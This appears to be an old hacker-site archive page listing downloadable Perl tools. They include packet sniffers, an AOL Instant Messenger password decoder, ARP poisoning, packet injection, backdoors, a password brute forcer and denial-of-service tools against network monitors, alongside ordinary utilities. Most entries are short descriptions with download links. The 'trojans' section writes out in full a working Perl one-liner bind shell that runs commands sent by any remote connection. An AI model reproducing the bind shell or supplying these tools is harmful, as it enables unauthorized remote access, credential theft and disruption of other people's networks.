|
|
archives . tools . passive scanning
|
|
PDump v0.80
PDump is a thorough perl based tcpdump utility that provides many features available in other passive network mapping applications including passive os detection, active response to certain conditions, and data injection into open tcp connections without loss of connectivity.
 Download PDump
PDump Homepage
NDump v0.1
NDump is a simple perl script that dumps raw data from the network to a capture file. The capture file it generates can be used with nparse and naimpass to perform various analysis operations on the network data. It also provides a flexable environment for coding your own perl scripts to perform custom analysis on logged packets.
Download NDump
NDump Homepage
NParse v0.1.5
NParse is a perl script that analyzes ndump output files and prints the network data in readable form (hex, oct, dec, and ascii). It's useful for debugging network protocols and analyzing implementation problems.
Download NParse
NParse Homepage
NAIMPass v0.1
NAIMPass is a perl script that demonstrates the lack of security with AOL's AOLIM password "encoding" scheme. It will analyze a ndump output file, find AOLIM authentication packets and decode the username and password being sent to the login server.
Download NAIMPass
NAIMPass Homepage
RawSnif v0.8
RawSnif is a simple, configurable, perl script that allows you to filter data being sent across tcp/ip connections (similar to ngrep). This makes it easy to snif plaintext usernames/passwords going across the network.
Download RawSnif
RawSnif Homepage
|
|
archives . tools . active scanning
|
|
NBChk v0.1
NBChk is a customizable, multi-process, banner checking port scanner that will scan a range of hosts for a port that matches a specific string. This is useful for checking for vulnerable services on a range of hosts.
Download NBChk
NBChk Homepage
tkscan.pl
tkscan is a simple port scanner that uses perl/tk.
Download tkscan.pl
Pedesis v0.01
Pedesis is a perl version of nemesis for userland based packet injection. It uses the Packet:: perl module, a 100% perl packet manipulation suite for injection/sniffing and encoding/decoding, the library and pedesis is still a work in progress, so support may be limited.
Download Pedesis
Pedesis Homepage
|
|
archives . tools . libraries
|
|
Packet::
Packet is a module that attempts to implement libpcap/libnet into a perl module using 100% perl (no xs or c).. meaning you get the same features as libpcap/libnet (/w more portability) without libpcap or libnet.
Download Packet::
Packet:: Homepage
|
|
archives . tools . spoofing
|
|
tracertspoof.pl
This is just a proof of concept which spoofs routes when someone traceroutes you. That means if someone traceroutes you, they will see spoofed routes and your host's ip at the end of the list.
Download tracertspoof.pl
arpredir.pl
This program uses Packet:: to arp poisen a switch, meaning you you can have packets destined to other hosts forwarded to you (which can then be forward to the real host through ipforwarding) by the switch so you can sniff/inject.
Download arpredir.pl
inject.pl
This program uses Tk for a GUI and allows you to inject tcp/udp/icmp packets with a nice little interface.
Download inject.pl
console-inject.pl
This is the same as inject.pl, but for console.
Downlaod console-inject.pl
raw-ident.pl
An identd daemon that controls it's connection raw, not using functions such as socket(),send()/recv(), etc. As an example 'base' for other raw daemons.
Download raw-ident.pl
|
|
archives . tools . cryptography
|
|
md5.pl
Perl implementation of the md5 algorithm with string and file calculation for message-digest fingerprints (checksums).
Download md5.pl
cp5qrpff-fast.pl
Cp5's version of the original 531-byte qrpff-fast (DeCSS descrambling code). He was able to cut it down to 504-bytes using the same algorithm so it's the same speed as the original.
Download cp5qrpff-fast.pl
cp5qrpff.pl
Cp5's version of the original 526-byte qrpff (DeCSS descrambling code). He was able to cut it down to 500-bytes using the same algorithm so it's the same speed as the original.
Download cp5qrpff.pl
crypto.pl
A program that uses Term::ReadKey to interface with crypt.pl and create passwords without the password being displayed when you type it.
Download crypto.pl
decrypto.pl
Same as crypto.pl except it checks the encrypted and plain passwords to see if they match, this also hides the passwords when you type them in.
Download decrypto.pl
cracker.pl
Perl based brute forcer to an encrypted password using a specified list.
Download cracker.pl
clear.txt
Converting perl code to 'nothing' and then executing it from 'nothing'.
Download clear.txt
|
|
archives . tools . trojans
|
|
frontdoor.pl
A simple replacement for telnetd, has some nice things such as pty opening and all the good ANSI stuff can pass through the socket and some other fun stuff.
Download frontdoor.pl
pdoor
An old backdoor that doesn't open any ports and allows you to run programs remotely with a client that spoofs the source of the host and portscans will never find the backdoor since it only looks for certain types of packets and needs no 3way handshakes.
Download pdoor
pdoor Homepage
K-Rad One-Liner Bindshell
perl -MIO -e 'while($c=new IO::Socket::INET(LocalPort,9,Reuse,1,Listen)->accept){$~->fdopen($c,w);STDIN->fdopen($c,r);system$_ while<>}' - nuff said
|
|
archives . tools . denial of service
|
|
killmon.pl
This program attempts to kill all sniffers/network monitors/IDSs on your network or a remote host by using different denial of service attacks on passive network monitors.
Download killmon.pl
pijack
Old and ugly program that cp5 wrote when he started getting into sockets, it takes over IRC DCC connections before they get fully established.
Download pijack
|
|
|
|
ping.pl
This is a program that allows you to ping a host through ICMP and tcp, which allows you to see if a host is up even if icmp is blocked.
ping.pl
mp3-stream.pl
Mp3-stream allows you to switch between using your microphone and playing random mp3s on a live mp3 server for everyone to connect to. You can have something like a small talk radio show, have people listen to music then switch over to microphone and talk about music and then play some more music when everyone starts disconnecting :)
Download mp3-stream.pl
c2p.pl
c2p.pl is a replacement for perl's h2ph (C header to perl header), this does stuff like convert structs to hashes, create the %SIZEOF hash for the size in bytes of actual structs, and other stuff. To be used with Packet::.
Download c2p.pl
hybbot
hybbot is an IRC operator and channel service specifically written for SUIDNet, a fully ssl encrypted irc chat network.
Download hybbot
greph.pl
This is a program that takes a list of c/c++/header files and looks through all of them for a regexp recursively, which can be neat. But lets say if you're looking for a certain function in a program, but it's not in that program, and it's not in any of the headers that program uses, it would have to be in one of the headers of one of the headers, or could even go further. greph.pl will look through all of these files and keep looking recursively without repeating files.
Download greph.pl
mass.pl
mass.pl allows you to run one command on multiple files when that command only allows you to run it on one file. One example is tar. Say you want to tar -xvf a few different tarballs, but tar only allows you to do one at a time. With mass.pl you can easily do something like ./mass.pl 'tar -xvf *.tar'.
Download mass.pl
mkmod.pl
mkmod.pl allows you to take a normal perl program and easily convert it into a module, making the easy work easier :) good to use when you're doing this with a lot of programs and want something automated.
Download mkmod.pl
burn.pl
burn.pl is a program that uses tk as a gui interface with mkisofs and burncd to easily burn cds.
Download burn.pl
|
|
|
|
|
